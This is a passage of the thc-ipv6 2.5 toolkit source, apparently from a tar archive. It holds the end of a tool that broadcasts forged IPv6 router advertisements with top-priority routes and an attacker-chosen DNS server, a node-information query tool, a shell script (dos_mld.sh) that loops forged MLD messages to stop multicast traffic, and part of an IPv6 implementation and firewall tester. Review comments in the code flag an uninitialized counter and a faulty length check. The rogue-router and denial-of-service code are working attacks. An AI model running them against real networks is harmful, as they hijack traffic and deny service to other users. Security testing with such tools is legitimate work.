} } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) myoff = do_hdr_size; frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); memset(mac, 0, sizeof(mac)); interface = argv[optind]; mtu = thc_get_mtu(interface); if (argc - optind >= 5) mtu = atoi(argv[optind + 4]); if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); if (argc - optind >= 4 && argv[optind + 3] != NULL) ip6 = thc_resolve6(argv[optind + 3]); else ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); frip6 = ip6; frint = interface; frmac = mac6; if (argc - optind >= 4 && argv[optind + 2] != NULL) dns = thc_resolve6(argv[optind + 2]); else dns = thc_resolve6("ff02::fb"); routerip = argv[optind + 1]; if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) { printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. 
ff80::01/16\n"); exit(-1); } *ptr++ = 0; size = atoi(ptr); routerip6 = thc_resolve6(routerip); route6 = thc_resolve6(routerip); if (routerip6 == NULL || size < 1 || size > 128) { fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]); exit(-1); } if (size < 48 || size > 64) fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size); if (dns == NULL) { fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]); exit(-1); } if (ip6 == NULL) { fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]); exit(-1); } if (mtu < 1 || mtu > 65536) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu); if (mac6 == NULL) { fprintf(stderr, "Error: mac address in invalid\n"); exit(-1); } memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } i = 128 - size; j = i / 8; k = i % 8; if (k > 0) j++; memset(route6 + 16 - j, 0, j); if (k > 0) route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k); // buf[3] = 250; // 0-3: reachable timer buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = size; // prefix length buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); memcpy(&buf[32], route6, 16); i = 48; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, mac6, 6); i += 6; // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 
0x00; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word i += 16; // 56-71 address, all zeros for default // specific route routing option 2000::/3 buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x03; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0x20; // 56-71 address: 2000:: i += 15; // specific route routing option 2000::/3 buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x07; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0xfc; // 56-71 address: fc:: i += 15; // dns option buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // 74-75 reserved memset(buf + i, 1, 4); // validity time i += 4; memcpy(buf + i, dns, 16); // dns server i += 16; frbuflen = i; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0) return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; // init pcap printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]); while (1) { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, 
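type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); } while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0); sleep(5); } return 0; } thc-ipv6-2.5/node_query6.c0000644000000000000000000001124412251022440014114 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

/* seen counts the replies of a known type that were printed; ret is the
   exit status handed to exit() by clean_exit (0 once a reply was accepted). */
char *frbuf, *frbuf2, *frint, buf3[1504];
int frbuflen, frbuf2len, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, seen = 0, ret = -1;
unsigned char *frip6, *frmac, *frdst;
thc_ipv6_hdr *frhdr = NULL;

/* Prints the usage text for the program name prg and exits with status -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s interface target\n\n", prg);
  printf("Sends an ICMPv6 node query request to the target and dumps the replies.\n\n");
// printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * Capture callback (main hands it to thc_pcap_check): prints one ICMPv6 node
 * information reply.
 *
 * foo    - unused
 * header - pcap record header; only caplen is read
 * data   - captured frame, link-layer header first
 *
 * The frame comes from the network and is untrusted. The IPv6 header is taken
 * to start at offset 14 of the frame, or at do_hdr_size when that is set.
 * Frames that are shorter than 40 + 16 bytes after that offset, that are not
 * ICMPv6, or whose ICMPv6 type is not ICMP6_INFOREPLY are dropped silently.
 * Byte 45 of the IPv6 packet selects what is printed (2: DNS name, 3: IPv6
 * addresses, 4: IPv4 addresses). Every accepted reply sets ret to 0; replies
 * of type 2, 3 or 4 also increment seen.
 */
void dump_node_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ipv6hdr = (unsigned char *) (data + 14);
  int i, len = header->caplen - 14;

  if (do_hdr_size) {
    len = header->caplen - do_hdr_size;
    ipv6hdr = (unsigned char *) (data + do_hdr_size);
  }

  /* check the captured length first: every header byte read below (up to
     index 45) must lie inside the captured data */
  if (len < 40 + 16)
    return;
  if (do_hdr_size && (ipv6hdr[0] & 240) != 0x60)
    return;
  if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_INFOREPLY)
    return;
  ret = 0;

  printf("Reply from %s:\n", thc_ipv62notation(ipv6hdr + 8));
  switch (ipv6hdr[45]) {
    case 2:
      printf(" DNS result: ");
      if (len <= 60) {
        printf("empty\n");
      } else {
        /* the name is supplied by the remote node and need not be NUL
           terminated, so the scan stops at the end of the captured data;
           control bytes are shown as '.' and the capture buffer, which is
           const for this callback, is no longer written to */
        for (i = 61; i < len && ipv6hdr[i] != 0; i++)
          putchar(ipv6hdr[i] < 32 ? '.' : ipv6hdr[i]);
        putchar('\n');
      }
      seen++;
      break;
    case 3:
      printf(" IPv6 result: ");
      if (len <= 76) {
        printf("empty\n");
      } else {
        printf("\n");
        /* one 16 byte address is printed per 20 byte step, from offset 60 */
        i = 60;
        while (i + 16 <= len) {
          printf(" %s\n", thc_ipv62notation((char *) (ipv6hdr+ i)));
          i += 20;
        }
      }
      seen++;
      break;
    case 4:
      printf(" IPv4 result: ");
      if (len == 56) {
        printf("empty\n");
      } else {
        printf("\n");
        /* one 4 byte address is printed per 8 byte step, from offset 60 */
        i = 60;
        while (i + 4 <= len) {
          printf(" %d.%d.%d.%d\n", ipv6hdr[i], ipv6hdr[i + 1], ipv6hdr[i + 2], ipv6hdr[i + 3]);
          i += 8;
        }
      }
      seen++;
      break;
    default:
      printf(" Unknown type (%d) we did not send!\n", ipv6hdr[45]);
  }
  printf("\n");
}

/* Exit path, also installed by main as the SIGALRM handler: reports when no
   reply was printed and exits with ret. */
void clean_exit(int sig) {
  if (seen == 0)
    printf("No reply received.\n");
  exit(ret);
}

/* NOTE(review): main() below runs "cnt += getpid()" while cnt is still uninitialized ("int i, cnt;"), so the 4 bytes copied to buf + 4 start from an indeterminate value. */
int main(int argc, char *argv[]) { char *interface, mac[6] = "", string[] = "ip6 and icmp6"; unsigned char *mac6 = mac; unsigned char buf[512]; unsigned char *dst; int i, cnt; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; pcap_t *p; if (argc != 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "r")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } interface = argv[optind]; mac6 = thc_get_own_mac(interface); if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: could not resolve %s\n", argv[2]); return -1; } memset(buf, 0, sizeof(buf)); memcpy(buf + 8, dst, 16); i = 24; cnt += getpid(); memcpy(buf + 4, (char *) &cnt + _TAKE4, 4); cnt++; if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_INFOREQUEST, 0, 0x00020000, buf, i, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; usleep(1000); memcpy(buf + 4, (char *) &cnt + _TAKE4, 4); cnt++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_INFOREQUEST, 0, 0x0003003e, buf, i, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; usleep(1000); memcpy(buf + 4, (char *) &cnt + _TAKE4, 4); cnt++; if ((pkt =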
thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_INFOREQUEST, 0, 0x00040002, buf, i, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; signal(SIGALRM, clean_exit); alarm(5); while (seen != 3) { while (thc_pcap_check(p, (char *) dump_node_reply, NULL) > 0); usleep(100); } clean_exit(0); return 0; // not reached } thc-ipv6-2.5/dos_mld.sh0000755000000000000000000000103312234222353013471 0ustar rootroot#!/bin/bash test -z "$1" -o "$1" = "-h" && { echo "Syntax: $0 [-2] interface [target-link-local-address multicast-address]" echo If specified, the multicast address of the target will be dropped first. echo All multicast traffic will cease after a while. echo Specify -2 to use MLDv2. exit 1 } X="" test "$1" = "-2" && { X="2" shift } while `true`; do fake_mld${X}6 $i query :: ff02::1 1 fe80:: 11:22:33:44:55:66 33:33:00:00:00:02 test -n "$3" fake_mld${X}6 $i del "$3" ff02::2 1 "$2" 11:22:33:44:55:66 sleep 5 done thc-ipv6-2.5/implementation6.c0000644000000000000000000022235312251022437015002 0ustar rootroot/* * Tests various IPv6 specific options for their implementations * This can also be used to test firewalls, check what it passes. * A sniffer on the other side of the firewall or running implementation6d * shows you what got through. 
* */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

/* State shared between the test driver and the capture callbacks:
   matched carries the verdict of the last callback run, gtype*, gpos, epos,
   gpattern, gsrc and gdst carry what the driver expects, etype and ecode
   carry the ICMPv6 type and code of an error reply, and ret_code is set to 0
   once a test passed. */
int ret_code = 1, matched = 0, gtype1, gtype1a, gtype2, gtype2a, gpos, epos, onecase = 0;
unsigned char *gpattern, *gsrc, *gdst, etype, ecode;

/* Prints the usage text for the program name prg and exits with status -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-p] [-s sourceip6] interface destination [test-case-number]\n\n", prg);
  printf("Options:\n");
  printf(" -s sourceip6 use the specified source IPv6 address\n");
  printf(" -p do not perform an alive check at the beginning and end\n");
  printf("\nPerforms some IPv6 implementation checks, can be used to test some\nfirewall features too. Takes approx. 2 minutes to complete.\n");
  exit(-1);
}

/* Capture callback that does nothing; check_alive passes it to
   thc_pcap_check to consume packets without inspecting them. */
void ignoreit(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  return;
}

/*
 * Capture callback used by check_for_reply_n.
 *
 * The IPv6 header is taken to start at offset 14 of the captured frame, or at
 * do_hdr_size when that is set. Sets matched to 2 for a neighbor
 * advertisement whose source address (bytes 8..23) equals gdst and whose
 * destination address (bytes 24..39) equals gsrc. Sets matched to 1, and
 * etype/ecode to bytes 40 and 41, for a parameter problem message whose
 * source equals gsrc and destination equals gdst. Neighbor solicitations and
 * ICMP6_TTLEXEED messages are skipped. When byte 6 is NXT_FRAG the ICMPv6
 * type is looked up 8 bytes further in.
 *
 * NOTE(review): len shares its declaration with ipv6hdr and is therefore an
 * unsigned char, so caplen is truncated to 8 bits before 14 is subtracted.
 * NOTE(review): the only length test returns when len is GREATER than
 * 86 + off, although the debug text says "too short"; nothing checks that
 * the captured data reaches the offsets read here (0, 6, 40, 41, 40 + off,
 * and 16 bytes at 8 and 24). Confirm the intended bound before relying on
 * this callback with frames from an untrusted network.
 * NOTE(review): the address comparison in the parameter problem branch is
 * the mirror image of the neighbor advertisement branch - confirm that is
 * intended.
 */
void check_packet_n(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ipv6hdr = (unsigned char *) data, len = header->caplen;
  int off = 0;

  ipv6hdr = (unsigned char *) (data + 14);
  len -= 14;

  if (do_hdr_size) {
    ipv6hdr = (unsigned char *) (data + do_hdr_size);
    len -= (do_hdr_size - 14);
    /* high nibble of the first byte must be the IP version 6 */
    if ((ipv6hdr[0] & 240) != 0x60)
      return;
  }

  if (debug) {
    printf("DEBUG: packet received\n");
    thc_dump_data(ipv6hdr, len, "Received Packet");
  }
  /* a fragment header directly after the IPv6 header shifts the payload */
  if (ipv6hdr[6] == NXT_FRAG)
    off = 8;
  if (86 + off < len) {
    if (debug)
      printf("\nDEBUG: packet too short\n");
    return;
  }
  if (ipv6hdr[6] == NXT_ICMP6 && (ipv6hdr[40] == ICMP6_NEIGHBORSOL || ipv6hdr[40] == ICMP6_TTLEXEED))
    return;
  if (off == 8 && (ipv6hdr[40] == NXT_ICMP6 && (ipv6hdr[40+off] == ICMP6_NEIGHBORSOL || ipv6hdr[40+off] == ICMP6_TTLEXEED)))
    return;
  if ((ipv6hdr[6] == NXT_ICMP6 && ipv6hdr[40] == ICMP6_NEIGHBORADV) || (off == 8 && ipv6hdr[40] == NXT_ICMP6 && ipv6hdr[40+off] == ICMP6_NEIGHBORADV)) {
    if (memcmp(ipv6hdr + 8, gdst, 16) == 0 && memcmp(ipv6hdr + 24 , gsrc, 16) == 0) {
      matched = 2;
      return;
    }
  } else if ((ipv6hdr[6] == NXT_ICMP6 && ipv6hdr[40] == ICMP6_PARAMPROB)||(off == 8 && ipv6hdr[40] == NXT_ICMP6 && ipv6hdr[40+off] == ICMP6_PARAMPROB)) {
    if (memcmp(ipv6hdr + 8, gsrc, 16) == 0 && memcmp(ipv6hdr + 24, gdst, 16) == 0) {
      matched = 1;
      etype = ipv6hdr[40];
      ecode = ipv6hdr[41];
      return;
    }
  }
  return;
}

/*
 * Waits for the reply to a test packet and prints the verdict.
 *
 * p   - capture handle polled through thc_pcap_check
 * src - address stored in gsrc for check_packet_n
 * dst - address stored in gdst for check_packet_n
 *
 * Polls until check_packet_n sets matched above 0 or until time(NULL) has
 * moved more than 4 seconds past the start. Prints "FAILED - no reply",
 * "FAILED - error reply [type:code]" (then sleeps 2 seconds unless onecase is
 * set) or "PASSED - we got a reply" (and sets ret_code to 0).
 * Returns matched.
 */
int check_for_reply_n(pcap_t * p, unsigned char *src, unsigned char *dst) {
  int ret = -1;
  time_t t;

  t = time(NULL);
  matched = 0;
  gsrc = src, gdst = dst;

  while (ret < 0) {
    (void) thc_pcap_check(p, (char *) check_packet_n, NULL);
    if (matched > 0)
      ret = 0;
    /* give up once more than 4 seconds have passed */
    if (time(NULL) > t + 4 && ret < 0)
      ret = 0;
  }
  if (matched <= 0)
    printf("FAILED - no reply\n");
  if (matched == 1) {
    printf("FAILED - error reply [%d:%d]\n", etype, ecode);
    if (onecase == 0)
      sleep(2);
  }
  if (matched == 2) {
    printf("PASSED - we got a reply\n");
    ret_code = 0;
  }
  usleep(500);
  return matched;
}

void check_packet(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); int len = header->caplen - 14, off = 0; if (do_hdr_size) { ipv6hdr = (unsigned char *) (data + do_hdr_size); len -= (do_hdr_size - 14); if ((ipv6hdr[0] & 240) != 0x60) return; } matched = 0; if (debug) { printf("DEBUG: packet received\n"); thc_dump_data(ipv6hdr, len, "Received Packet"); } if (ipv6hdr[6] == NXT_FRAG) off = 8; if (gpos+off > len && (epos == 0 || epos+off > len)) { matched = -1; if (debug) printf("\nDEBUG: packet too short (2)\n"); return; } if ((ipv6hdr[6] == NXT_ICMP6 || (off == 8 && ipv6hdr[40] == NXT_ICMP6)) && (ipv6hdr[40+off] == ICMP6_NEIGHBORSOL || ipv6hdr[40] == ICMP6_NEIGHBORADV || ipv6hdr[40+off] == ICMP6_TTLEXEED) && ipv6hdr[40+off] != gtype2 && ipv6hdr[40+off] != gtype2a) { matched = -1; return; } //printf("gpos: %d, pattern %x, found %x\n", gpos, gpattern[0], ipv6hdr[gpos]); //printf("epos: %d, pattern %x, found %x\n", epos, gpattern[0], ipv6hdr[epos]); if (gpos > 0 && memcmp(ipv6hdr + gpos + off, gpattern, 4) != 0) { matched = -1; if (debug) printf("\nDEBUG: packet contents different\n"); if
(epos == 0) return; } else { matched = 1; etype = ipv6hdr[40]; ecode = ipv6hdr[41]; } if (epos > 0 && epos < len && memcmp(ipv6hdr + epos + off, gpattern, 4) == 0) { matched = 1; etype = ipv6hdr[40]; ecode = ipv6hdr[41]; } if ((ipv6hdr[6] == gtype1 || gtype1 == 0) && (ipv6hdr[40] == gtype2 || gtype2 == 0) && (gpos <= 0 || (gpos < len && memcmp(ipv6hdr + gpos, gpattern, 4) == 0))) matched = 2; if (off == 8 && ((ipv6hdr[40] == gtype1 || gtype1 == 0) && (ipv6hdr[40+off] == gtype2 || gtype2 == 0) && (gpos <= 0 || (gpos < len && memcmp(ipv6hdr + gpos + off, gpattern, 4) == 0)))) matched = 2; if ((ipv6hdr[6] == gtype1a || gtype1a == 0) && (ipv6hdr[40] == gtype2a || gtype2a == 0) && (gpos <= 0 || (gpos + off < len && memcmp(ipv6hdr + gpos, gpattern, 4) == 0))) matched = 2; if (off == 8 && ((ipv6hdr[40] == gtype1a || gtype1a == 0) && (ipv6hdr[40+off] == gtype2a || gtype2a == 0) && (gpos <= 0 || (gpos + off < len && memcmp(ipv6hdr + gpos + off, gpattern, 4) == 0)))) matched = 2; if (debug) printf("\nDEBUG: hdr[6] %d|%d == %d, hdr[40] %d|%d == %d, pos[%d/%d] %02x%02x%02x%02x == %02x%02x%02x%02x\n", ipv6hdr[6], gtype1, gtype1a, ipv6hdr[40], gtype2, gtype2a, gpos, epos, gpos == 0 ? 0 : ipv6hdr[gpos], gpos == 0 ? 0 : ipv6hdr[gpos + 1], gpos == 0 ? 0 : ipv6hdr[gpos + 2], gpos == 0 ? 0 : ipv6hdr[gpos + 3], gpos == 0 ? 0 : gpattern[0], gpos == 0 ? 0 : gpattern[1], gpos == 0 ? 0 : gpattern[2], gpos == 0 ? 
0 : gpattern[3]); return; }

/*
 * Waits for the reply to a test packet, using check_packet as the capture
 * callback, and prints the verdict.
 *
 * p              - capture handle polled through thc_pcap_check
 * type1, type2   - first accepted pair: value of IPv6 header byte 6 and of
 *                  byte 40 (0 accepts any value), stored in gtype1/gtype2
 * type1a, type2a - second accepted pair, stored in gtype1a/gtype2a
 * pos, pos2      - offsets into the IPv6 packet at which check_packet
 *                  compares 4 bytes with pattern, stored in gpos/epos
 * pattern        - the bytes to look for, stored in gpattern
 *
 * The loop ends when thc_pcap_check reports a value above 0 and the callback
 * did not reject the packet (a callback verdict of -1 resets matched to 0
 * and keeps waiting), or when time(NULL) has moved more than 4 seconds past
 * the start. Prints "FAILED - no reply", "FAILED - error reply [type:code]"
 * (then sleeps 2 seconds unless onecase is set) or "PASSED - we got a reply"
 * (and sets ret_code to 0). Returns matched.
 */
int check_for_reply(pcap_t *p, int type1, int type2, int type1a, int type2a, int pos, int pos2, unsigned char *pattern) {
  int ret = -1;
  time_t t;

  t = time(NULL);
  matched = 0;
  /* hand the expectations to check_packet through the file-level globals */
  gtype1 = type1;
  gtype1a = type1a, gtype2 = type2;
  gtype2a = type2a, gpos = pos;
  epos = pos2;
  gpattern = pattern;

  while (ret < 0) {
    if (thc_pcap_check(p, (char *) check_packet, NULL) > 0)
      ret = 1;
    /* the callback rejected this packet: forget it and keep waiting */
    if (matched == -1) {
      ret = -1;
      matched = 0;
    }
    /* give up once more than 4 seconds have passed */
    if (time(NULL) > t + 4 && ret < 0)
      ret = 0;
  }
  if (matched == 0)
    printf("FAILED - no reply\n");
  if (matched == 1) {
    printf("FAILED - error reply [%d:%d]\n", etype, ecode);
    if (onecase == 0)
      sleep(2);
  }
  if (matched == 2) {
    printf("PASSED - we got a reply\n");
    ret_code = 0;
  }
  usleep(500);
  return matched;
}

/*
 * Checks whether anything is captured on p after pinging dst.
 *
 * p         - capture handle polled through thc_pcap_check
 * interface - interface name passed to thc_ping6
 * src, dst  - addresses passed to thc_ping6
 *
 * Pending packets are consumed first, then one ping is sent. A second ping
 * is sent once, after time(NULL) has moved more than 1 second past the start
 * without a capture. The wait ends on the first capture or after more than
 * 4 seconds. The packet itself is not inspected (the callback is ignoreit),
 * so any packet delivered on p counts as a sign of life.
 * Returns 1 when something was captured, 0 otherwise.
 */
int check_alive(pcap_t * p, char *interface, unsigned char *src, unsigned char *dst) {
  int ret = -2;
  time_t t;

  /* drain whatever is already queued on the capture handle */
  while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0);
  thc_ping6(interface, src, dst, 16, 1);
  t = time(NULL);
  while (ret < 0) {
    if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0)
      ret = 1;
    /* ret == -2 marks "no retry sent yet"; -1 marks "retry sent" */
    if (time(NULL) > t + 1 && ret == -2) {
      thc_ping6(interface, src, dst, 16, 1);
      ret = -1;
    }
    if (time(NULL) > t + 4 && ret < 0)
      ret = 0;
  }
  return ret > 0 ? 1 : 0;
}

int main(int argc, char *argv[]) { int test = 0, count = 1; unsigned char buf[1500], bla[1500], bigbla[65536], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src "; unsigned char *dst6, *ldst6 = malloc(16), *src6 = NULL, *lsrc6, *mcast6; unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6]; thc_ipv6_hdr *hdr; int i, j, k, srcmtu, fragsize, use_srcroute_type = -1, offset = 14; pcap_t *p; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0; char *interface; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "pds:")) >= 0) { switch (i) { case 'p': noping = 1; break; case 'd': debug = 1; break; case 's': src6 = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: unknown option %c\n", i); exit(-1); } } interface = argv[optind]; dst6 = thc_resolve6(argv[optind + 1]); if (dst6 == NULL) { fprintf(stderr, "Error: can not resolve %s to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } memcpy(ldst6, dst6, 16); memset(ldst6 + 2, 0, 6); ldst6[0] = 0xfe; ldst6[1] = 0x80; mcast6 = thc_resolve6("ff02::1"); if (argc >= optind + 3) { test = atoi(argv[optind + 2]); onecase = 1; } memset(buf, 0, sizeof(buf)); memset(null_buffer, 0, sizeof(null_buffer)); if (do_hdr_size) offset = do_hdr_size; if (src6 == NULL) src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if (src6 != NULL && src6[0] == 0xfe) lsrc6 = src6; else lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK); if (lsrc6 == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } strcat(string, thc_ipv62notation(src6)); strcat(string2, thc_ipv62notation(dst6)); srcmac = thc_get_own_mac(interface); if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } if ((srcmtu =
thc_get_mtu(interface)) <= 0) { fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface); exit(-1); } fragsize = ((srcmtu - 62) / 8) * 8; if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } setvbuf(stdout, NULL, _IONBF, 0); memset(tests, 0, sizeof(tests)); printf("Performing implementation checks on %s via %s:\n", argv[optind + 1], argv[optind]); if (noping == 0) { if (check_alive(p, interface, src6, dst6) == 0) { fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[optind + 1]); exit(-1); } else printf("Test 0: normal ping6\t\t\t\tPASSED - we got a reply\n"); } /********************** TEST CASES ************************/ if (test == 0 || test == count) { printf("Test %2d: hop-by-hop ignore option\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: hop-by-hop ignore option 2kb size\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bigbla, 0, sizeof(bigbla)); bigbla[0] = NXT_IGNORE; bigbla[1] = 0; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &bigbla, 2046) < 0) return -1; 
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 2 hop-by-hop headers\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 2; i++) if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if 